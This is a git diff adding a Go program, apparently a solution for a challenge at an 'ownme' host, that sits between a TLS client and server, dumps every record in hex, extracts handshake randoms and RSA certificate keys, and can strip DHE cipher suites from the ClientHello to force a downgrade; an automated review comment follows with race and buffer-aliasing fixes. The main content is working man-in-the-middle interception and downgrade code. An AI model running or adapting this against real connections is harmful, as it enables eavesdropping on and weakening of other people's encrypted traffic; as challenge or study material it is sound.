Diffstat (limited to 'main.go')
-rw-r--r--main.go152
1 files changed, 152 insertions, 0 deletions
diff --git a/main.go b/main.go
new file mode 100644
index 0000000..9f59703
--- /dev/null
+++ b/main.go
@@ -0,0 +1,152 @@
+package main
+
+import (
+ "bytes"
+ "crypto/rsa"
+ "crypto/x509"
+ "encoding/hex"
+ "fmt"
+ "log"
+ "net"
+ "sync"
+)
+
+const (
+ host = `ownme.ipredator.se` // 198.167.222.202
+ clientPort = `:10002`
+ serverPort = `:10000`
+)
+
+type Direction int
+
+const (
+ ServerClient Direction = iota
+ ClientServer
+)
+
+func (d Direction) String() string {
+ switch d {
+ case ServerClient:
+ return "Server → Client"
+ case ClientServer:
+ return "Client → Server"
+ }
+ return "unknown"
+}
+
+type Data struct {
+ Key rsa.PublicKey
+ Rnd []byte
+}
+
+var data = make(map[Direction]Data)
+
+func (dir Direction) sniffCert(b []byte) error {
+ if i := bytes.Index(b, []byte{0x30, 0x82, 0x04, 0x2f}); i > 0 {
+ cert := b[i : i+1075]
+ crt, err := x509.ParseCertificate(cert)
+ if err != nil {
+ return err
+ }
+ d := data[dir]
+ d.Key = *crt.PublicKey.(*rsa.PublicKey)
+ data[dir] = d
+ }
+ return nil
+}
+
+func (dir Direction)sniffRnd(b []byte) error {
+ rnd := b[0x0b:0x2b]
+ fmt.Println(dir, "rnd", len(rnd), "bytes")
+ d := data[dir]
+ d.Rnd = rnd
+ data[dir] = d
+ return nil
+}
+
+// Remove DHE_RSA Chifers in Client Hello
+// altering any value leads to Handshake Failure after Cert Verify ???
+func downgrade(b []byte) int {
+ fmt.Println("downgrade")
+ fmt.Println(hex.Dump(b))
+
+ //b[0x0a] -= 2 // TLS 1.0
+ b[0x04] -= 14 // handshake len
+ b[0x08] -= 14 // hello len
+ b[0x2d] -= 14 // cipher set len
+
+ copy(b[0x2e:], b[0x2e+14:]) // copy second half over first (7 non dhe ciphers)
+ //copy(b[0x2e+14:], b[0x2e+28:]) // preserve fist half (7 dhe ciphers)
+
+ return len(b)-14
+}
+
+var trydowngrade = false
+
+func swapciphers(b []byte) {
+ fmt.Println(hex.Dump(b))
+
+ cipher1 := b[0x2e:0x3c]
+ cipher2 := b[0x3c:0x4a]
+
+ buf := make([]byte, len(b))
+ copy(buf, b)
+ copy(buf[0x2e:], cipher2)
+ copy(buf[0x3c:], cipher1)
+ copy(b, buf)
+}
+
+func (dir Direction) sniff(src, dst net.Conn, wg *sync.WaitGroup) {
+ defer wg.Done()
+ buf := make([]byte, 4096) // 1452
+ k := 1
+ for {
+ n, err := src.Read(buf)
+ if err != nil {
+ dst.Close()
+ return
+ }
+
+ if k == 1 {
+ dir.sniffRnd(buf)
+ if trydowngrade && dir == ClientServer {
+ n = downgrade(buf[:n])
+ //swapciphers(buf[:n])
+ }
+ }
+
+ fmt.Println(k, dir, n, "bytes")
+ fmt.Println(hex.Dump(buf[:n]))
+ k++
+
+ dir.sniffCert(buf[:n])
+
+ _, err = dst.Write(buf[:n])
+ if err != nil {
+ log.Println(dir, err)
+ return
+ }
+ }
+}
+
+func main() {
+ var wg sync.WaitGroup
+
+ srv, err := net.Dial("tcp", host+serverPort)
+ if err != nil {
+ log.Fatal(err)
+ }
+ defer srv.Close()
+
+ cnt, err := net.Dial("tcp", host+clientPort)
+ if err != nil {
+ log.Fatal(err)
+ }
+ defer cnt.Close()
+
+ wg.Add(2)
+ go ServerClient.sniff(srv, cnt, &wg)
+ go ClientServer.sniff(cnt, srv, &wg)
+ wg.Wait()
+// fmt.Println(data)
+}
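Review bot: The package-level `data` map is written from both `sniff` goroutines (through `sniffRnd` and `sniffCert`) with no synchronisation, which is a data race and can abort the process with Go's concurrent-map-write fatal error; guard it with a mutex. In `sniffRnd`, `d.Rnd = rnd` stores a sub-slice of the read buffer that `sniff` reuses, so the saved random is overwritten by the next `src.Read`. The call site also passes `buf` rather than `buf[:n]`, so a short first read records bytes that were never received; call `dir.sniffRnd(buf[:n])` and check the returned error. `sniffCert` needs the same lock around its update of `data[dir]`, and its unchecked `crt.PublicKey.(*rsa.PublicKey)` assertion panics on a certificate whose key is not RSA.

```go
var (
	dataMu sync.Mutex // guards data; both sniff goroutines update it
	data   = make(map[Direction]Data)
)

func (dir Direction) sniffRnd(b []byte) error {
	// Reject a first read that is too short to contain the 32-byte hello random.
	if len(b) < 0x2b {
		return fmt.Errorf("%v: first read too short for hello random: %d bytes", dir, len(b))
	}
	// Copy: b aliases the buffer that sniff reuses on every Read.
	rnd := append([]byte(nil), b[0x0b:0x2b]...)
	// … unchanged: fmt.Println of the random length …
	dataMu.Lock()
	// … unchanged: read-modify-write of data[dir] …
	dataMu.Unlock()
	return nil
}
```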